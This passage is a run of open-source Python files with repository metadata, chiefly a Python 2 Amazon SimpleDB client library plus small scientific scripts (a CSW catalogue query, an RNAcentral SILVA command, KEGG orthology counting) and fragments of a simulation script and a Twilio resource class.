t += dt; i = i + 1
rms = norm(U)/vol
dudt = errornorm(theta, theta_0, 'L2')/dt
print 't =', t, 'dt =', dt, 'its({0}/{1}) ='.format(i,args.update_u_every), its, \
'rms =', rms, '|du/dt| =', dudt
log.append((t, rms))
if dudt < args.tol: break
if args.plot:
plot(theta, mode='color')
if args.output:
File('output/cavity-{0}-{1}-{2}-GWW14.pvd'.format(args.Ra, args.n*2**args.refine, args.correct)) << theta
#interactive()
|
cwaluga/conservative_dolfin
|
src/cavity.py
|
Python
|
mit
| 6,198
|
# coding: utf-8
# # Query `apiso:ServiceType` on data.gov
# In[26]:
from owslib.csw import CatalogueServiceWeb
from owslib import fes
import numpy as np
# In[27]:
endpoint = 'http://catalog.data.gov/csw-all' #granule level production catalog
#endpoint = 'http://data.ioos.us/csw'
csw = CatalogueServiceWeb(endpoint,timeout=60)
print csw.version
# In[28]:
val = 'coawst'
filter1 = fes.PropertyIsLike(propertyname='apiso:AnyText',literal=('*%s*' % val),
escapeChar='\\',wildCard='*',singleChar='?')
filter_list = [ filter1 ]
# In[29]:
val = 'experimental'
filter2 = fes.PropertyIsLike(propertyname='apiso:AnyText',literal=('*%s*' % val),
escapeChar='\\',wildCard='*',singleChar='?')
filter_list = [fes.And([filter1, filter2])]
# In[30]:
csw.getrecords2(constraints=filter_list,maxrecords=100,esn='full')
print len(csw.records.keys())
for rec in list(csw.records.keys()):
print csw.records[rec].title
# In[31]:
choice=np.random.choice(list(csw.records.keys()))
print(csw.records[choice].title)
csw.records[choice].references
# In[32]:
csw.records[choice].xml
# We see that the `OPeNDAP` service is available, so let's add that to query
# In[34]:
val = 'opendap'
filter3 = fes.PropertyIsLike(propertyname='apiso:ServiceType',literal=('*%s*' % val),
escapeChar='\\',wildCard='*',singleChar='?')
filter_list = [fes.And([filter1, filter2, filter3])]
# In[35]:
csw.getrecords2(constraints=filter_list,maxrecords=100,esn='full')
print len(csw.records.keys())
for rec in list(csw.records.keys()):
print csw.records[rec].title
# Oops. We get no records now. This should have returned the same records. This should work when data.gov applies this patch to pycsw:
#
# https://github.com/geopython/pycsw/commit/d1d3c4ea7ba5b651353d22b2759bab64c6d57d87
#
|
rsignell-usgs/notebook
|
CSW/data.gov_pycsw.py
|
Python
|
mit
| 1,865
|
# -*- coding: utf-8 -*-
"""
Copyright [2009-2020] EMBL-European Bioinformatics Institute
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from pathlib import Path
import click
from rnacentral_pipeline.databases.silva import parser as silva
from rnacentral_pipeline.writers import entry_writer
@click.group("silva")
def cli():
"""
Commands for dealing with SILVA data.
"""
@cli.command("parse")
@click.argument("silva-file", type=click.File("r"))
@click.argument("taxonomy", type=click.Path())
@click.argument(
"output",
default=".",
type=click.Path(
writable=True,
dir_okay=True,
file_okay=False,
),
)
def process_silva(silva_file, taxonomy, output):
entries = silva.parse(silva_file, taxonomy)
with entry_writer(Path(output)) as writer:
writer.write(entries)
|
RNAcentral/rnacentral-import-pipeline
|
rnacentral_pipeline/cli/silva.py
|
Python
|
apache-2.0
| 1,309
|
import httplib2
import urlparse
import urllib
import time
import hmac
import base64
try:
import xml.etree.ElementTree as ET
except ImportError:
import elementtree.ElementTree as ET
from UserDict import DictMixin
__all__ = ['SimpleDB', 'Domain', 'Item', 'AttributeEncoder', 'where', 'every', 'item_name', 'SimpleDBError', 'ItemDoesNotExist']
QUERY_OPERATORS = {
# Note that `is null`, `is not null` and `every` are handled specially by using
# attr__eq = None, attr__noteq = None, and every(), respectively.
'eq': '=', # equals
'noteq': '!=', # not equals
'gt': '>', # greather than
'gte': '>=', # greater than or equals
'lt': '<', # less than
'lte': '<=', # less than or equals
'like': 'like', # contains, works with `%` globs: '%string' or 'string%'
'notlike': 'not like', # doesn't contain
'btwn': 'between', # falls within range (inclusive)
'in': 'in', # equal to one of
}
RESERVED_KEYWORDS = (
'OR', 'AND', 'NOT', 'FROM', 'WHERE', 'SELECT', 'LIKE', 'NULL', 'IS', 'ORDER',
'BY', 'ASC', 'DESC', 'IN', 'BETWEEN', 'INTERSECTION', 'LIMIT', 'EVERY',
)
class SimpleDBError(Exception): pass
class ItemDoesNotExist(Exception): pass
def generate_timestamp():
return time.strftime('%Y-%m-%dT%H:%M:%S', time.gmtime())
def _utf8_str(s):
if isinstance(s, unicode):
return s.encode('utf-8')
else:
return str(s)
def escape(s):
return urllib.quote(s, safe='-_~')
def urlencode(d):
if isinstance(d, dict):
d = d.iteritems()
return '&'.join(['%s=%s' % (escape(k), escape(v)) for k, v in d])
class SignatureMethod(object):
@property
def name(self):
raise NotImplementedError
def build_signature_base_string(self, request):
sig = '\n'.join((
request.get_normalized_http_method(),
request.get_normalized_http_host(),
request.get_normalized_http_path(),
request.get_normalized_parameters(),
))
return sig
def build_signature(self, request, aws_secret):
raise NotImplementedError
class SignatureMethod_HMAC_SHA1(SignatureMethod):
name = 'HmacSHA1'
version = '2'
def build_signature(self, request, aws_secret):
base = self.build_signature_base_string(request)
try:
import hashlib # 2.5
hashed = hmac.new(aws_secret, base, hashlib.sha1)
except ImportError:
import sha # deprecated
hashed = hmac.new(aws_secret, base, sha)
return base64.b64encode(hashed.digest())
class SignatureMethod_HMAC_SHA256(SignatureMethod):
name = 'HmacSHA256'
version = '2'
def build_signature(self, request, aws_secret):
import hashlib
base = self.build_signature_base_string(request)
hashed = hmac.new(aws_secret, base, hashlib.sha256)
return base64.b64encode(hashed.digest())
class Response(object):
def __init__(self, response, content, request_id, usage):
self.response = response
self.content = content
self.request_id = request_id
self.usage = usage
class Request(object):
def __init__(self, method, url, parameters=None):
self.method = method
self.url = url
self.parameters = parameters or {}
def set_parameter(self, name, value):
self.parameters[name] = value
def get_parameter(self, parameter):
try:
return self.parameters[parameter]
except KeyError:
raise SimpleDBError('Parameter not found: %s' % parameter)
def to_postdata(self):
return urlencode([(_utf8_str(k), _utf8_str(v)) for k, v in self.parameters.iteritems()])
def get_normalized_parameters(self):
"""
Returns a list constisting of all the parameters required in the
signature in the proper order.
"""
return urlencode([(_utf8_str(k), _utf8_str(v)) for k, v in
sorted(self.parameters.iteritems())
if k != 'Signature'])
def get_normalized_http_method(self):
return self.method.upper()
def get_normalized_http_path(self):
parts = urlparse.urlparse(self.url)
if not parts[2]:
# For an empty path use '/'
return '/'
return parts[2]
def get_normalized_http_host(self):
parts = urlparse.urlparse(self.url)
return parts[1].lower()
def sign_request(self, signature_method, aws_key, aws_secret):
self.set_parameter('AWSAccessKeyId', aws_key)
self.set_parameter('SignatureVersion', signature_method.version)
self.set_parameter('SignatureMethod', signature_method.name)
self.set_parameter('Timestamp', generate_timestamp())
self.set_parameter('Signature', signature_method.build_signature(self, aws_secret))
class AttributeEncoder(object):
"""
AttributeEncoder converts Python objects into UTF8 strings suitable for
storage in SimpleDB.
"""
def encode(self, domain, attribute, value):
return value
def decode(self, domain, attribute, value):
return value
class NumberEncoder(object):
def encode(self, domain, attribute, value):
if isinstance(value, int):
return str(value + 10000)
return value
def decode(self, domain, attribute, value):
if value.isdigit():
return int(value) - 10000
return value
class SimpleDB(object):
"""Represents a connection to Amazon SimpleDB."""
ns = 'http://sdb.amazonaws.com/doc/2009-04-15/'
service_version = '2009-04-15'
try:
import hashlib # 2.5+
signature_method = SignatureMethod_HMAC_SHA256
except ImportError:
signature_method = SignatureMethod_HMAC_SHA1
def __init__(self, aws_access_key, aws_secret_access_key, db='sdb.amazonaws.com',
secure=True, encoder=AttributeEncoder()):
"""
Use your `aws_access_key` and `aws_secret_access_key` to create a connection to
Amazon SimpleDB.
SimpleDB requests are directed to the host specified by `db`, which defaults to
``sdb.amazonaws.com``.
The optional `secure` argument specifies whether HTTPS should be used. The
default value is ``True``.
"""
self.aws_key = aws_access_key
self.aws_secret = aws_secret_access_key
if secure:
self.scheme = 'https'
else:
self.scheme = 'http'
self.db = db
self.http = httplib2.Http()
self.encoder = encoder
def _make_request(self, request):
headers = {'Content-Type': 'application/x-www-form-urlencoded; charset=utf-8',
'host': self.db}
request.set_parameter('Version', self.service_version)
request.sign_request(self.signature_method(), self.aws_key, self.aws_secret)
response, content = self.http.request(request.url, request.method, headers=headers, body=request.to_postdata())
e = ET.fromstring(content)
error = e.find('Errors/Error')
if error:
raise SimpleDBError(error.find('Message').text)
meta = e.find('{%s}ResponseMetadata' % self.ns)
request_id = meta.find('{%s}RequestId' % self.ns).text
usage = meta.find('{%s}BoxUsage' % self.ns).text
return Response(response, content, request_id, usage)
def _sdb_url(self):
return urlparse.urlunparse((self.scheme, self.db, '', '', '', ''))
def create_domain(self, name):
"""
Creates a new domain.
The domain `name` argument must be a string, and must be unique among
the domains associated with your AWS Access Key. The CreateDomain operation
may take 10 or more seconds to complete. By default, you can create up to
100 domains per account.
Returns the newly created `Domain` object.
"""
data = {
'Action': 'CreateDomain',
'DomainName': name,
}
request = Request("POST", self._sdb_url(), data)
self._make_request(request)
return Domain(name, self)
def delete_domain(self, domain):
"""
Deletes a domain. Any items (and their attributes) in the domain are
deleted as well. The DeleteDomain operation may take 10 or more seconds
to complete.
The `domain` argument can be a string representing the name of the
domain, or a `Domain` object.
"""
if isinstance(domain, Domain):
domain = domain.name
data = {
'Action': 'DeleteDomain',
'DomainName': domain,
}
request = Request("POST", self._sdb_url(), data)
self._make_request(request)
def _list_domains(self):
# Generator that yields each domain associated with the AWS Access Key.
data = {
'Action': 'ListDomains',
'MaxNumberOfDomains': '100',
}
while True:
request = Request("POST", self._sdb_url(), data)
response = self._make_request(request)
e = ET.fromstring(response.content)
domain_result = e.find('{%s}ListDomainsResult' % self.ns)
if domain_result:
domain_names = domain_result.findall('{%s}DomainName' % self.ns)
for domain in domain_names:
yield Domain(domain.text, self)
# SimpleDB will return a max of 100 domains per request, and
# will return a NextToken if there are more.
next_token = domain_result.find('{%s}NextToken' % self.ns)
if next_token is None:
break
data['NextToken'] = next_token.text
else:
break
def list_domains(self):
"""
Lists all domains associated with your AWS Access Key.
"""
return list(self._list_domains())
def has_domain(self, domain):
if isinstance(domain, Domain):
domain = domain.name
return domain in [d.name for d in self.list_domains()]
def get_domain_metadata(self, domain):
"""
Returns information about the domain. Includes when the domain was
created, the number of items and attributes, and the size of attribute
names and values.
The `domain` argument can be a string representing the name of the
domain or a `Domain` object.
"""
if isinstance(domain, Domain):
domain = domain.name
data = {
'Action': 'DomainMetadata',
'DomainName': domain,
}
request = Request("POST", self._sdb_url(), data)
response = self._make_request(request)
e = ET.fromstring(response.content)
metadata = {}
metadata_result = e.find('{%s}DomainMetadataResult' % self.ns)
if metadata_result is not None:
for child in metadata_result.getchildren():
tag, text = child.tag, child.text
if tag.startswith('{%s}' % self.ns):
tag = tag[42:] # Die ElementTree namespaces, die!
metadata[tag] = text
return metadata
def put_attributes(self, domain, item, attributes):
"""
Creates or replaces attributes in an item.
The `domain` and `item` arguments can be strings representing the
domain and item names, or `Domain` and `Item` objects, respectively.
The `attributes` argument should be a dictionary containing the
attribute names -> values that you would like stored for the
specified `item` or a list of (<attribute name>, <value>, <replace>)
tuples.
By default, attributes are "replaced". This causes new attribute values to
overwrite existing values. For example, if an item has the attributes
('a', '1'), ('b', '2') and ('b', '3') and you call put_attributes using
the attributes ('b', '4'), the final attributes of the item are changed to
('a', '1') and ('b', '4'), which replaces the previous value of the 'b'
attribute with the new value.
SimpleDB allows you to associate multiple values with a single attribute.
If an attribute has multiple values, it will be coalesced into a single
list. Likewise, if you'd like to store multiple values for a single
attribute, you should pass in a list value to this method.
"""
if isinstance(domain, Domain):
domain = domain.name
if isinstance(item, Item):
item = item.name
if hasattr(attributes, 'items'):
# Normalize attributes into a list of tuples.
attributes = attributes.items()
data = {
'Action': 'PutAttributes',
'DomainName': domain,
'ItemName': item,
}
idx = 0
for attribute in attributes:
name = attribute[0]
values = attribute[1]
if not hasattr(values, '__iter__') or isinstance(values, basestring):
values = [values]
for value in values:
value = self.encoder.encode(domain, name, value)
data['Attribute.%s.Name' % idx] = name
data['Attribute.%s.Value' % idx] = value
if len(attribute) == 2 or attribute[2]:
data['Attribute.%s.Replace' % idx] = 'true'
idx += 1
request = Request("POST", self._sdb_url(), data)
self._make_request(request)
def batch_put_attributes(self, domain, items, replace=True):
"""
Performs multiple PutAttribute operations in a single call. This yields
savings in round trips and latencies and enables SimpleDB to optimize
your request, which generally yields better throughput.
The `domain` argument can be a string representing the name of the
domain or a `Domain` object.
The `items` argument should be a list of `Item` objects or a list of
(<item name>, <attributes>) tuples. See the documentation for the
put_attribute method for a description of how attributes should be
represented.
"""
if isinstance(domain, Domain):
domain = domain.name
data = {
'Action': 'BatchPutAttributes',
'DomainName': domain,
}
for item_idx, item in enumerate(items):
if isinstance(item, Item):
item = [item.name, item.attributes]
item = list(item)
if hasattr(item[1], 'items'):
# Normalize attributes into a list of tuples.
item[1] = item[1].items()
data['Item.%s.ItemName' % item_idx] = item[0]
attr_idx = 0
for attribute in item[1]:
name = attribute[0]
values = attribute[1]
if isinstance(values, basestring):
values = [values]
for value in values:
value = self.encoder.encode(domain, name, value)
data['Item.%s.Attribute.%s.Name' % (item_idx, attr_idx)] = name
data['Item.%s.Attribute.%s.Value' % (item_idx, attr_idx)] = value
if len(attribute) == 2 or attribute[2]:
data['Item.%s.Attribute.%s.Replace' % (item_idx, attr_idx)] = 'true'
attr_idx += 1
request = Request("POST", self._sdb_url(), data)
self._make_request(request)
def delete_attributes(self, domain, item, attributes=None):
"""
Deletes one or more attributes associated with an item. If all attributes of
an item are deleted, the item is deleted.
If the optional parameter `attributes` is not provided, all items are deleted.
"""
if isinstance(domain, Domain):
domain = domain.name
if isinstance(item, Item):
item = item.name
if attributes is None:
attributes = {}
data = {
'Action': 'DeleteAttributes',
'DomainName': domain,
'ItemName': item,
}
for i, (name, value) in enumerate(attributes.iteritems()):
value = self.encoder.encode(domain, name, value)
data['Attribute.%s.Name' % i] = name
data['Attribute.%s.Value' % i] = value
request = Request("POST", self._sdb_url(), data)
self._make_request(request)
def get_attributes(self, domain, item, attributes=None):
"""
Returns all of the attributes associated with the item.
The returned attributes can be limited by passing a list of attribute
names in the optional `attributes` argument.
If the item does not exist, an empty set is returned. An error is not
raised because SimpleDB provides no guarantee that the item does not
exist on another replica. In other words, if you fetch attributes that
should exist, but get an empty set, you may have better luck if you try
again in a few hundred milliseconds.
"""
if isinstance(domain, Domain):
domain = domain.name
if isinstance(item, Item):
item = item.name
data = {
'Action': 'GetAttributes',
'DomainName': domain,
'ItemName': item,
}
if attributes:
for i, attr in enumerate(attributes):
data['AttributeName.%s' % i] = attr
request = Request("POST", self._sdb_url(), data)
response = self._make_request(request)
e = ET.fromstring(response.content)
attributes = dict.fromkeys(attributes or [])
attr_node = e.find('{%s}GetAttributesResult' % self.ns)
if attr_node:
attributes.update(self._parse_attributes(domain, attr_node))
return attributes
def _parse_attributes(self, domain, attribute_node):
# attribute_node should be an ElementTree node containing Attribute
# child elements.
attributes = {}
for attribute in attribute_node.findall('{%s}Attribute' % self.ns):
name = attribute.find('{%s}Name' % self.ns).text
value = attribute.find('{%s}Value' % self.ns).text
value = self.encoder.decode(domain, name, value)
if name in attributes:
if isinstance(attributes[name], list):
attributes[name].append(value)
else:
attributes[name] = [attributes[name], value]
else:
attributes[name] = value
return attributes
def _select(self, domain, expression):
if not isinstance(domain, Domain):
domain = Domain(domain, self)
data = {
'Action': 'Select',
'SelectExpression': expression,
}
while True:
request = Request("POST", self._sdb_url(), data)
response = self._make_request(request)
e = ET.fromstring(response.content)
item_node = e.find('{%s}SelectResult' % self.ns)
if item_node is not None:
for item in item_node.findall('{%s}Item' % self.ns):
name = item.findtext('{%s}Name' % self.ns)
attributes = self._parse_attributes(domain, item)
yield Item(self, domain, name, attributes)
# SimpleDB will return a max of 100 items per request, and
# will return a NextToken if there are more.
next_token = item_node.find('{%s}NextToken' % self.ns)
if next_token is None:
break
data['NextToken'] = next_token.text
else:
break
def select(self, domain, expression):
return list(self._select(domain, expression))
def __iter__(self):
return self._list_domains()
def __getitem__(self, name):
# TODO: Check if it's a valid domain
return Domain(name, self)
def __delitem__(self, name):
self.delete_domain(name)
class where(object):
"""
Encapsulate where clause as objects that can be combined logically using
& and |.
"""
# Connection types
AND = 'AND'
OR = 'OR'
default = AND
def __init__(self, *args, **query):
self.connector = self.default
self.children = []
self.children.extend(args)
for key, value in query.iteritems():
if '__' in key:
parts = key.split('__')
if len(parts) != 2:
raise ValueError("Filter arguments should be of the form "
"`field__operation`")
field, operation = parts
else:
field, operation = key, 'eq'
if operation not in QUERY_OPERATORS:
raise ValueError('%s is not a valid query operation' % (operation,))
self.children.append((field, operation, value))
def __len__(self):
return len(self.children)
def to_expression(self, encoder):
"""
Returns the query expression for the where clause. Returns an empty
string if the node is empty.
"""
where = []
for child in self.children:
if hasattr(child, 'to_expression'):
expr = child.to_expression(encoder)
if expr:
where.append('(%s)' % expr)
else:
field, operation, value = child
operator = QUERY_OPERATORS[operation]
if hasattr(self, '_make_%s_condition' % operation):
expr = getattr(self, '_make_%s_condition' % operation)(field, operator, value, encoder)
else:
expr = self._make_condition(field, operator, value, encoder)
where.append(expr)
conn_str = ' %s ' % self.connector
return conn_str.join(where)
def add(self, other, conn):
"""
Adds a new clause to the where statement. If the connector type is the
same as the root's current connector type, the clause is added to the
first level. Otherwise, the whole tree is pushed down one level and a
new root connector is created, connecting the existing clauses and the
new clause.
"""
if other in self.children and conn == self.connector:
return
if len(self.children) < 2:
self.connector = conn
if self.connector == conn:
if isinstance(other, where) and (other.connector == conn or
len(other) <= 1):
self.children.extend(other.children)
else:
self.children.append(other)
else:
obj = self._clone()
self.connector = conn
self.children = [obj, other]
def _make_condition(self, attribute, operation, value, encoder):
value = encoder(attribute, value)
return "%s %s '%s'" % (self._quote_attribute(attribute),
operation, self._quote(value))
def _make_eq_condition(self, attribute, operation, value, encoder):
value = encoder(attribute, value)
if value is None:
return '%s IS NULL' % attribute
return self._make_condition(attribute, operation, value, encoder)
def _make_noteq_condition(self, attribute, operation, value, encoder):
value = encoder(attribute, value)
if value is None:
return '%s IS NOT NULL' % attribute
return self._make_condition(attribute, operation, value, encoder)
def _make_in_condition(self, attribute, operation, value, encoder):
value = [encoder(attribute, v) for v in value]
return '%s %s(%s)' % (attribute, operation,
', '.join("'%s'" % self._quote(v) for v in value))
def _make_btwn_condition(self, attribute, operation, value, encoder):
if len(value) != 2:
raise ValueError('Invalid value `%s` for between clause. Requires two item list.' % value)
value = [encoder(attribute, value[0]), encoder(attribute, value[1])]
return "%s between '%s' and '%s'" % (attribute, self._quote(value[0]), self._quote(value[1]))
def _quote_attribute(self, s):
if s.upper() in RESERVED_KEYWORDS:
return '`%s`' % s
return s
def _quote(self, s):
return s.replace('\'', '\'\'')
def _clone(self, klass=None, **kwargs):
if klass is None:
klass = self.__class__
obj = klass()
obj.connector = self.connector
obj.children = self.children[:]
return obj
def _combine(self, other, conn):
if not isinstance(other, where):
raise TypeError(other)
obj = self._clone()
obj.add(other, conn)
return obj
def __or__(self, other):
return self._combine(other, self.OR)
def __and__(self, other):
return self._combine(other, self.AND)
class every(where):
"""
Encapsulates a where clause and uses the every() operator which,
for multi-valued attributes, checks that every attribute satisfies
the constraint.
"""
def _every(self, attribute):
return "every(%s)" % self._quote_attribute(attribute)
def _make_condition(self, attribute, operation, value, encoder):
return super(every, self)._make_condition(self._every(attribute), operation, value, encoder)
def _make_eq_condition(self, attribute, operation, value, encoder):
if value is None:
attribute = self._every(attribute)
return super(every, self)._make_eq_condition(attribute, operation, value, encoder)
def _make_noteq_condition(self, attribute, operation, value, encoder):
if value is None:
attribute = self._every(attribute)
return super(every, self)._make_noteq_condition(attribute, operation, value, encoder)
def _make_in_condition(self, attribute, operation, value, encoder):
return super(every, self)._make_in_condition(self._every(attribute), operation, value, encoder)
def _make_btwn_condition(self, attribute, operation, value, encoder):
return super(every, self)._make_btwn_condition(self._every(attribute), operation, value, encoder)
class item_name(where):
"""
Encapsulates a where clause that filters based on item names.
"""
def __init__(self, *equals, **query):
self.connector = self.default
self.children = []
for equal in equals:
self.children.append(('itemName()', 'eq', equal))
for operation, value in query.iteritems():
self.children.append(('itemName()', operation, value))
class Query(object):
DESCENDING = 'DESC'
ASCENDING = 'ASC'
def __init__(self, domain):
self.domain = domain
self.where = where()
self.fields = []
self.limit = None
self.order = None
self._result_cache = None
def __iter__(self):
return iter(self._get_results())
def __len__(self):
return len(self._get_results())
def __repr__(self):
return repr(list(self))
def __getitem__(self, k):
if not isinstance(k, (slice, int, long)):
raise TypeError
if self._result_cache:
return self._result_cache[k]
q = self._clone()
if isinstance(k, slice) and k.stop >= 0:
q.limit = k.stop + 1
elif k >= 0:
q.limit = k + 1
return list(q)[k]
def all(self):
return self._clone()
def limit(self, limit):
q = self._clone()
q.limit = limit
return q
def filter(self, *args, **kwargs):
q = self._clone()
q.where = self.where & where(*args, **kwargs)
return q
def values(self, *fields):
q = self._clone()
q.fields = fields
return q
def item_names(self):
q = self._clone(klass=ItemNameQuery)
return q
def count(self):
if self._result_cache:
return len(self._result_cache)
q = self._clone()
q.fields = ['count(*)']
return int(list(q)[0]['Count'])
def order_by(self, field):
q = self._clone()
if field[0] == '-':
field = field[1:]
q.order = (field, self.DESCENDING)
else:
q.order = (field, self.ASCENDING)
return q
def get(self, name):
q = self._clone()
q = q.filter(item_name(name))
if len(q) < 1:
raise ItemDoesNotExist(name)
return q[0]
def to_expression(self):
"""
Creates the query expression for this query. Returns the expression
string.
"""
# Used to encode attribute values in `where` instances, since they
# don't know the Domain they're operating on.
encoder = lambda a, v: self.domain._encode(a, v)
if self.fields:
output_list = self.fields
else:
output_list = ['*']
stmt = ['SELECT', ', '.join(output_list), 'FROM', '`%s`' % self.domain.name]
if len(self.where):
stmt.extend(['WHERE', self.where.to_expression(encoder)])
if self.order is not None:
stmt.append('ORDER BY')
stmt.extend(self.order)
if self.limit is not None:
stmt.append('LIMIT %s' % self.limit)
return ' '.join(stmt)
def _clone(self, klass=None, **kwargs):
if klass is None:
klass = self.__class__
q = klass(self.domain)
q.where = self.where._clone()
q.fields = self.fields[:]
q.order = self.order
q.__dict__.update(kwargs)
return q
def _get_results(self):
if self._result_cache is None:
self._result_cache = self.domain.select(self.to_expression())
return self._result_cache
class ItemNameQuery(Query):
def values(self, *fields):
raise NotImplementedError
def _get_fields(self):
# always return itemName() as the sole field
return ['itemName()']
def _set_fields(self, value):
# ignore any attempt to set the fields attribute
pass
fields = property(_get_fields, _set_fields)
def _get_results(self):
if self._result_cache is None:
self._result_cache = [item.name for item in
self.domain.select(self.to_expression())]
return self._result_cache
class Domain(object):
def __init__(self, name, simpledb):
self.name = name
self.simpledb = simpledb
self.items = {}
@property
def metadata(self):
return self.simpledb.get_domain_metadata(self)
def filter(self, *args, **kwargs):
return self._get_query().filter(*args, **kwargs)
def select(self, expression):
return self.simpledb.select(self, expression)
def all(self):
return self._get_query()
def count(self):
return self._get_query().count()
def values(self, *args):
return self._get_query().values(*args)
def item_names(self):
return self._get_query().item_names()
def get(self, name):
if name not in self.items:
self.items[name] = Item.load(self.simpledb, self, name)
item = self.items[name]
if not item:
raise ItemDoesNotExist(name)
return item
def _encode(self, attribute, value):
# Encode an attribute, value combination using the simpledb AttributeEncoder.
return self.simpledb.encoder.encode(self.name, attribute, value)
def __getitem__(self, name):
try:
return self.get(name)
except ItemDoesNotExist:
return Item(self.simpledb, self, name, {})
def __setitem__(self, name, value):
if not hasattr(value, '__getitem__') or isinstance(value, basestring):
raise SimpleDBError('Domain items must be dict-like, not `%s`' % type(value))
del self[name]
item = Item(self.simpledb, self, name, value)
item.save()
def __delitem__(self, name):
self.simpledb.delete_attributes(self, name)
if name in self.items:
del self.items[name]
def __unicode__(self):
return self.name
def __iter__(self):
return iter(self.all())
def __repr__(self):
return '<%s: %s>' % ( self.__class__.__name__, unicode(self))
def _get_query(self):
return Query(self)
class Item(DictMixin):
@classmethod
def load(cls, simpledb, domain, name):
attrs = simpledb.get_attributes(domain, name)
return cls(simpledb, domain, name, attrs)
def __init__(self, simpledb, domain, name, attributes=None):
self.simpledb = simpledb
self.domain = domain
self.name = name
self.attributes = attributes or {}
def __getitem__(self, name):
return self.attributes[name]
def __setitem__(self, name, value):
self.attributes[name] = value
def __delitem__(self, name):
if name in self.attributes:
self.simpledb.delete_attributes(self.domain, self, {name: self.attributes[name]})
del self.attributes[name]
def keys(self):
return self.attributes.keys()
def save(self):
self.simpledb.put_attributes(self.domain, self, self.attributes)
|
saymedia/python-simpledb
|
simpledb/simpledb.py
|
Python
|
bsd-3-clause
| 33,851
|
#!/usr/bin/env python
from distutils.core import setup
setup(author='Jeffrey Scudder',
name='atom',
author_email='j.s@google.com',
license='Apache 2.0',
url='https://github.com/qmagico/google-atom',
packages=['atom'],
version='2.0.18',
package_dir = {'atom':'atom'},)
|
qmagico/google-atom
|
setup.py
|
Python
|
apache-2.0
| 311
|
'''
lcakegg2counts.py
==================
:Author: Nick Ilott
:Release: $Id$
:Date: |today|
:Tags: Python
Purpose
-------
Count the number of alignments assigned to KEGG orthology groups. The alignments
can be counted at different levels of the KO hierarchy e.g. category A-D => high level
pathway - KO gene.
KO = Kegg orthology.
Usage
-----
Example::
cat in.lcakegg | python lcakegg2counts.py --kegg-table=kegg.table
Type::
python lcakegg2counts.py --help
for command line help.
Command line options
--------------------
'''
import os
import sys
import re
import optparse
import collections
import CGAT.IOTools as IOTools
import CGAT.Experiment as E
########################################
########################################
########################################
class KeggAssignment(object):
'''
class mapping alignment (read) with
kegg assignment
'''
def __init__(self):
'''
initialise class
'''
self.identifier = None
self.ko = []
def getKo(self, identifier, ko):
'''
return data
'''
self.identifier = identifier
self.ko = ko
return self
#######################################
def lcakegg_iterator(infile):
'''
return iterator for kegg
output from lcamapper.sh
'''
for line in infile.readlines():
data = line[:-1].split(";")
identifier = data[0]
ko = re.findall("K\S+", data[2])
# remove trailing ":"
ko = [x[:-1] for x in ko]
yield KeggAssignment().getKo(identifier, ko)
#######################################
#######################################
#######################################
class KeggTableEntry(object):
'''
class for assigning pathways to KO
'''
def __init__(self):
'''
initialise class. cata etc refers
to categories in the kegg KO
hierarchy - category A, B, C
'''
self.ko = None
self.cata = None
self.catb = None
self.catc = None
def getMapping(self, ko, cata, catb, catc):
'''
map KO to pathways
'''
self.ko, self.cata, self.catb, self.catc = ko, cata, catb, catc
return self
#######################################
def kegg_table_iterator(infile):
'''
iterator for kegg table. Kegg table is
output from the keggtre2table.py script
'''
for line in infile.readlines():
data = line[:-1].split("\t")
ko, cata, catb, catc = data[-1], data[0], data[1], data[2]
yield KeggTableEntry().getMapping(ko, cata, catb, catc)
#######################################
#######################################
#######################################
def main( argv = None ):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if argv == None: argv = sys.argv
# setup command line parser
parser = E.OptionParser( version = "%prog version: $Id$",
usage = globals()["__doc__"] )
parser.add_option("-k", "--kegg-table", dest="kegg_table", type="string",
help="supply table of pathways to KO mappings. Usually by \
keggtre2table.py ")
parser.add_option("-m", "--method", dest="method", type="choice",
choices=("count", "proportion"), help="method for computing counts")
parser.add_option("-l", "--level", dest="level", type="choice",
choices=("A", "B", "C", "D"), help="what level of the KEGG KO hierarchy \
to perform the analysis?")
# set default options
parser.set_defaults(method="proportion"
, level="A")
## add common options (-h/--help, ...) and parse command line
(options, args) = E.Start( parser, argv = argv )
if not options.kegg_table:
raise ValueError("must specify a KEGG table")
E.info("reading KEGG table")
# container mapping pathway/gene to KO
kegg = {}
# iterate over kegg table and add kos into list
# at the desired level
c = E.Counter()
for ko in kegg_table_iterator(IOTools.openFile(options.kegg_table)):
c.ko_input += 1
kegg[ko.ko] = (ko.cata, ko.catb, ko.catc)
E.info("read in KEGG table")
E.info("iterating over alignments")
result = collections.defaultdict(int)
for alignment in lcakegg_iterator(options.stdin):
c.input += 1
if not alignment.ko:
c.unmapped += 1
else:
c.mapped += 1
if options.level == "A":
catindex = 0
elif options.level == "B":
catindex = 1
elif options.level == "C":
catindex = 2
elif options.level == "D":
catindex = None
if not catindex:
if len(alignment.ko) > 1:
# doesn't matter if it is mapped
# to a pathway
for k in alignment.ko:
result[k] += 1
else:
result[alignment.ko[0]] += 1
else:
# if the read maps to multiple kegg entries
# add count for each one
if len(alignment.ko) > 1:
try:
for k in alignment.ko:
result[kegg[k][catindex]] += 1
# if the KO is not mapped to a pathway
# count as no hit
except KeyError:
c.no_hit += 1
else:
try:
result[kegg[alignment.ko[0]][catindex]] += 1
except KeyError:
c.no_hit += 1
total_mapped = c.mapped
for pathway, count in result.iteritems():
if options.method == "proportion":
options.stdout.write("\t".join([pathway, str(float(count)/total_mapped)]) + "\n")
else:
options.stdout.write("\t".join([pathway, str(count)]) + "\n")
options.stdout.write("no_pathway_hit\t%s" % str(float(c.no_hit)/ c.mapped))
## write footer and output benchmark information.
E.Stop()
if __name__ == "__main__":
sys.exit( main(sys.argv) )
|
CGATOxford/proj029
|
scripts/lcakegg2counts.py
|
Python
|
bsd-3-clause
| 6,443
|
# coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base import deserialize
from twilio.base import values
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
from twilio.base.page import Page
class TollFreeList(ListResource):
""" """
def __init__(self, version, account_sid):
"""
Initialize the TollFreeList
:param Version version: Version that contains the resource
:param account_sid: The SID of the Account that created the resource
